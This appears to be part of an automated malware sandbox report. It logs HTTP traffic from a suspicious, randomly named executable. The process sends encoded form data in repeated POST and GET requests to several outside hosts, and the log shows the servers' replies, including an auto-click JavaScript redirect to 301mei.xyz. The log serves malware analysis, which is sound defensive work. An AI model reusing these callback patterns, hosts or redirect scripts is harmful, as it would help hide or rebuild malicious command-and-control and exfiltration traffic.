nfQvOKMijG1NJtdZfnf+k0qJw6z0ZK+HV2m+GCmU8Lw537BWIaqmX0v/Tsr12Smx708Jo6fVNMbfgoSCx7zLinjtRe4x0/+btF3Gkmh9sY [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.6497683.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:28.251796961 CEST476OUTGET /aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:28.717616081 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:05:28 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 45 6f 37 68 79 48 6e 33 30 63 70 33 50 4d 6f 77 50 44 6a 55 53 31 65 73 6f 2f 5a 62 61 37 68 48 48 4d 63 31 2b 44 6b 33 79 72 46 2b 43 41 73 4b 6b 73 49 4f 48 4f 75 68 74 4d 30 35 43 43 2f 65 33 48 6a 57 6c 44 71 7a 69 59 61 33 6c 44 7a 43 75 4d 4a 76 56 51 78 73 56 53 74 45 44 79 4a 51 67 46 34 45 56 7a 68 49 45 36 34 43 33 61 67 75 79 63 38 76 58 79 54 56 72 4c 48 53 34 63 2b 69 43 6b 35 79 46 77 67 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.649769103.176.91.154805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:33.782044888 CEST710OUTPOST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 47 74 51 74 37 4d 6c 37 62 6f 35 56 6e 41 77 4c 72 77 6e 6e 68 51 4d 30 76 63 61 54 39 56 63 74 4b 6b 64 39 52 76 59 54 69 55 78 44 54 66 71 64 67 71 6e 50 6a 6a 6f 6c 44 53 6a 50 6a 32 53 57 74 6e 2f 61 37 62 78 38 4d 6c 46 6d 46 7a 6c 59 6f 63 6f 53 51 74 33 37 54 65 52 66 53 6c 64 45 59 51 4c 47 46 32 78 44 30 41 31 63 43 6b 4e 68 33 78 52 49 66 66 39 39 57 32 56 30 6d 31 6d 4a 56 56 34 2b 4f 79 55 2b 2f 6d 6c 36 41 33 48 30 34 61 72 76 4e 77 52 6e 6e 78 62 6b 4c 30 4a 75 54 36 58 69 63 6e 62 76 33 6c 2f 68 72 4b 6c 77 4d 50 58 75 35 6c 79 35 64 4b 74 61 36 38 79 35
                                                          Data Ascii: D0Pts04=hwyLeKEWTw8xGtQt7Ml7bo5VnAwLrwnnhQM0vcaT9VctKkd9RvYTiUxDTfqdgqnPjjolDSjPj2SWtn/a7bx8MlFmFzlYocoSQt37TeRfSldEYQLGF2xD0A1cCkNh3xRIff99W2V0m1mJVV4+OyU+/ml6A3H04arvNwRnnxbkL0JuT6Xicnbv3l/hrKlwMPXu5ly5dKta68y5
                                                          Jul 13, 2024 00:05:34.592546940 CEST552INHTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.649770103.176.91.154805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:36.312694073 CEST734OUTPOST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 6f 74 4b 45 74 39 57 75 59 54 6c 55 78 44 48 50 71 63 74 4b 6e 51 6a 6a 6c 51 44 54 50 50 6a 79 79 57 74 6d 50 61 36 73 63 71 4d 31 46 65 51 44 6c 47 6c 38 6f 53 51 74 33 37 54 65 56 31 53 6c 46 45 59 68 37 47 43 6e 78 45 71 51 31 62 46 6b 4e 68 67 68 52 4d 66 66 38 6f 57 33 4a 4f 6d 7a 71 4a 56 55 49 2b 50 6a 55 78 30 6d 6b 78 66 6e 47 42 37 5a 4b 77 55 52 55 4c 6e 68 33 57 61 58 41 4c 66 73 57 34 41 55 62 4d 6c 31 66 6a 72 49 39 43 4d 76 58 45 37 6c 4b 35 50 64 68 39 31 49 58 61 73 36 6e 72 6c 6d 46 62 4d 44 4b 54 6b 70 6a 63 53 6f 4b 58 31 41 3d 3d
                                                          Data Ascii: D0Pts04=hwyLeKEWTw8xHNgt+vd7cI5W7QwLwgnjhQA0vduD9HotKEt9WuYTlUxDHPqctKnQjjlQDTPPjyyWtmPa6scqM1FeQDlGl8oSQt37TeV1SlFEYh7GCnxEqQ1bFkNhghRMff8oW3JOmzqJVUI+PjUx0mkxfnGB7ZKwURULnh3WaXALfsW4AUbMl1fjrI9CMvXE7lK5Pdh91IXas6nrlmFbMDKTkpjcSoKX1A==
                                                          Jul 13, 2024 00:05:37.102924109 CEST552INHTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.649771103.176.91.154805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:38.844029903 CEST1747OUTPOST /8c7z/ HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.334es.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.334es.com/8c7z/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 68 77 79 4c 65 4b 45 57 54 77 38 78 48 4e 67 74 2b 76 64 37 63 49 35 57 37 51 77 4c 77 67 6e 6a 68 51 41 30 76 64 75 44 39 48 51 74 4b 56 4e 39 51 4e 67 54 6b 55 78 44 45 50 71 42 74 4b 6e 5a 6a 6a 74 63 44 53 79 30 6a 30 2b 57 2f 55 58 61 7a 2b 6b 71 47 31 46 65 50 54 6c 48 6f 63 6f 48 51 70 54 2f 54 66 6c 31 53 6c 46 45 59 69 54 47 52 57 78 45 6f 51 31 63 43 6b 4e 74 33 78 52 6b 66 63 4d 34 57 32 39 65 6c 44 4b 4a 55 30 59 2b 4d 52 38 78 6f 32 6b 7a 63 6e 47 5a 37 5a 47 56 55 52 59 35 6e 68 7a 77 61 56 63 4c 64 4a 76 79 61 58 6a 30 6e 55 33 6e 72 5a 67 6f 4e 72 61 30 38 55 44 42 4b 4e 35 76 2f 59 62 73 6a 4d 72 50 74 67 59 2b 4d 51 53 62 6f 66 61 59 62 72 58 4a 33 47 6b 35 6c 58 61 56 69 4b 4d 38 79 39 4b 4c 38 56 35 6f 77 54 43 68 70 5a 4a 5a 39 4f 2f 71 4f 6d 46 59 55 75 45 65 42 69 30 2b 76 75 4c 63 67 39 41 55 71 77 59 34 76 53 74 72 54 59 57 4f 57 68 73 63 31 59 79 68 31 64 38 78 65 75 48 47 5a 6a 33 2b 70 54 6f 62 32 52 55 47 58 35 4d 67 45 48 59 44 49 52 6d 33 64 47 [TRUNCATED]
                                                          Data Ascii: D0Pts04=hwyLeKEWTw8xHNgt+vd7cI5W7QwLwgnjhQA0vduD9HQtKVN9QNgTkUxDEPqBtKnZjjtcDSy0j0+W/UXaz+kqG1FePTlHocoHQpT/Tfl1SlFEYiTGRWxEoQ1cCkNt3xRkfcM4W29elDKJU0Y+MR8xo2kzcnGZ7ZGVURY5nhzwaVcLdJvyaXj0nU3nrZgoNra08UDBKN5v/YbsjMrPtgY+MQSbofaYbrXJ3Gk5lXaViKM8y9KL8V5owTChpZJZ9O/qOmFYUuEeBi0+vuLcg9AUqwY4vStrTYWOWhsc1Yyh1d8xeuHGZj3+pTob2RUGX5MgEHYDIRm3dGzGSxJ0hMTZ5FB+KSPGj5gXjsWhxdiEq61lNh/QbN+8ElVs/aUDmWOEHGuukyaWT9CWBnOzKgDqnBKa1MQUnrX7NXa5Wq0Cc6DCGqLXLIgQNi040m3eGwdTutoJ0Oyue5NGVzZLrGJMyXwP7yx3VcLT4sOwmJIr2kphf2HFKZmV+HwQ9hiDOsLlJpK7gJNiBvYnFzbQK0GXCPq/D9AK7cjC0isN6Vf4bwjUdlwNJRDXDq5mqJwz7qZ3Lr6bWnWEG6ljlwu8MamkuQazD8ky2gYTV3HjCEg+WfFiliEZvxp5ofFlbg6oc76FJg0lLSSFucfCo1C82AJPgraj+JQs7yocomK/vvSdp79DuzKpdK2zSKrQOrjGRMQmA2pYmyxDDTKJb+7G7tXNwyuY+7dsRV5b4aMaiUdGsEoVaDMhSLCO4DuSIgNUneU0kuybg8Ir9DzK9a+1LheymUyzrT+PivRwQWYfDoeZgOuZKFHeJevoB0vicHDet3lq5baCVzRUVFYCOs7hWY1GtnHJ2/v0vyq0yXzgPLpWfAs9aKdrZzLv6kjzAobKXn29PmH3vQaAqGB8YPQ5DALr/8MrNl60fBGSC1S6uyfhxdorbFt7D4L1aYD8L6upgMOaFRQf2dHF/2U5mH9qkNmlX03QtJ4is9AAQ6LOWfJ+WOXF [TRUNCATED]
                                                          Jul 13, 2024 00:05:39.668555975 CEST552INHTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.649772103.176.91.154805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:41.372349024 CEST463OUTGET /8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:42.187021017 CEST552INHTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.6497735.78.41.174805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:47.286871910 CEST725OUTPOST /6rlx/ HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.411divorce.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.411divorce.com/6rlx/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 38 72 54 71 7a 52 56 6a 34 56 30 57 42 6b 53 68 5a 4f 4a 50 4c 71 34 33 66 65 67 31 62 36 4f 54 33 7a 53 4c 71 35 51 49 43 79 59 4c 79 31 4c 76 4f 62 76 66 75 65 6f 6e 4b 76 53 5a 34 48 66 34 53 5a 4e 33 59 39 72 70 34 68 63 79 75 4e 61 73 76 54 74 51 76 64 56 32 4a 5a 33 48 50 77 56 45 76 4f 78 45 39 72 4b 32 37 61 37 70 64 70 44 79 73 41 47 38 4e 6e 33 67 64 38 41 77 56 53 54 57 62 61 7a 56 36 38 4d 36 77 6b 6b 4b 47 38 61 39 30 54 49 41 47 4a 77 6c 77 45 69 45 49 56 51 54 62 65 56 64 4d 76 59 5a 6b 49 30 68 39 45 49 2f 35 4f 2b 53 77 36 73 6e 33 4e 6e 49 71 57 4a 53
                                                          Data Ascii: D0Pts04=d0xgGJJTOMlk8rTqzRVj4V0WBkShZOJPLq43feg1b6OT3zSLq5QICyYLy1LvObvfueonKvSZ4Hf4SZN3Y9rp4hcyuNasvTtQvdV2JZ3HPwVEvOxE9rK27a7pdpDysAG8Nn3gd8AwVSTWbazV68M6wkkKG8a90TIAGJwlwEiEIVQTbeVdMvYZkI0h9EI/5O+Sw6sn3NnIqWJS
                                                          Jul 13, 2024 00:05:48.250333071 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:05:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
                                                          Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/"
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -POST
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Content-Encoding: gzip
                                                          Data Raw: 34 62 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 7b db 36 d2 e8 e7 f8 79 f6 3f a0 4a 5b db 2d 29 51 57 db 52 ec dd 34 4d da 9c 6d 9b 6e 93 34 dd 5e 1e 3d 94 08 49 8c 29 52 25 29 5f ea f5 f9 2d e7 eb f9 72 7e c4 fb cb ce cc 00 24 41 12 d4 c5 97 d4 fb ee eb 36 b6 04 0c 06 33 03 60 30 00 06 83 27 1f 7d f9 ea d9 9b 7f 7e ff 9c cd e2 b9 77 b2 f3 04 ff 30 cf f6 a7 c7 35 ee 9b 6f 5f d7 30 8d db ce c9 ce a3 27 73 1e db 6c 3c b3 c3 88 c7 c7 b5 b7 6f 5e 98 87 35 d6 00 00 ca 98 c5 f1 c2 e4 bf 2f dd b3 e3 da 4f e6 db a7 e6 b3 60 be b0 63 77 e4 f1 1a 1b 07 7e cc 7d 28 f5 f2 f9 31 77 a6 bc 86 f8 3c d7 3f 65 21 f7 8e 6b 0b d7 9f 8e ec f1 69 8d cd 42 3e 39 ae 21 ae 7e a3 d1 69 36 1d f7 2c 08 c7 bc 3e 0e e6 8d 8b b9 17 2e c6 f5 c5 6c 41 d5 02 86 68 1c ba 8b 98 c5 97 0b 7e 5c 8b f9 45 dc 78 6f 9f d9 22 15 ab 78 e4 04 e3 e5 1c 2a ae 27 1f 9e 7b 9c be 8f 3d 3b 8a be b3 e7 9c 1d b3 dd f7 d1 ee 00 b0 35 44 41 28 07 5f 62 37 f6 f8 49 c7 ea b0 ef 82 98 bd 08 96 be c3 fe c5 5e 3f 7f c5 de 60 0e fb 9a 87 fc 49 43 40 [TRUNCATED]
                                                          Data Ascii: 4b75}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x*'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+*d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
                                                          Jul 13, 2024 00:05:48.250382900 CEST1236INData Raw: bf 7e f3 ed 37 06 f3 dc 53 ce be e2 e3 d3 60 9f bd b6 27 76 e8 4a 80 2f ed e5 bc d1 81 0f 9f 35 fe 86 12 31 27 f6 98 b3 2b f9 11 05 d1 67 bb 28 0a 86 a2 d8 1d 50 06 c9 bd cf 04 b3 22 e9 9c bb d3 19 90 09 5c 27 30 21 8f c7 b3 3e f3 83 70 6e 7b 22
                                                          Data Ascii: ~7S`'vJ/51'+g(P"\'0!>pn{"Qg }oDlQlYj/o_}9^~~7sNw?v?q<g'%?;?a~~X~{U>{]`
                                                          Jul 13, 2024 00:05:48.250459909 CEST1236INData Raw: 95 ec 5e b8 7f 05 53 df 32 f4 0b 90 f5 7a 5d 4d 30 c2 a4 e8 b5 f1 f1 8d 4a 7f 7c 3d 38 a7 8d 8a ba 24 41 fc 31 64 e2 c7 f2 fb 00 89 1e 2f a1 99 e7 5f 73 db 79 4d ec 44 c7 1f 35 07 22 bf 3e f1 25 64 1d 94 5a 1c 10 fb 57 40 54 55 86 4c f3 83 67 81
                                                          Data Ascii: ^S2z]M0J|=8$A1d/_syMD5">%dZW@TULg?w'{9v<`<]CU/%!I)YP27df|w?Bg6-zM')'1FJa}~1 kywGihLg]5'C9oF0*1U/3=
                                                          Jul 13, 2024 00:05:48.250498056 CEST1236INData Raw: 66 01 01 76 35 3b 4c 4b ec 35 db 5d 87 4f 8d 70 3a b2 f7 7a 46 b3 73 60 b4 5a 07 46 73 9f 59 9f 60 e2 5e b3 db 35 0e 9b 90 d8 d9 67 a0 4f 3f d9 af ac ba 28 e1 ac 6e 55 8c d5 f5 ef 35 5b 2d a8 c7 32 9a 87 56 5a bd 65 b4 ac 43 a3 d9 b6 d6 d6 ae e9
                                                          Data Ascii: fv5;LK5]Op:zFs`ZFsY`^5gO?(nU5[-2VZeCHAEZ%V4t+&v%"ETIZ*?D%V[V+>4@ y]W8<f8\WVx:Jk6>kt4 aaAC`@L %!Ce
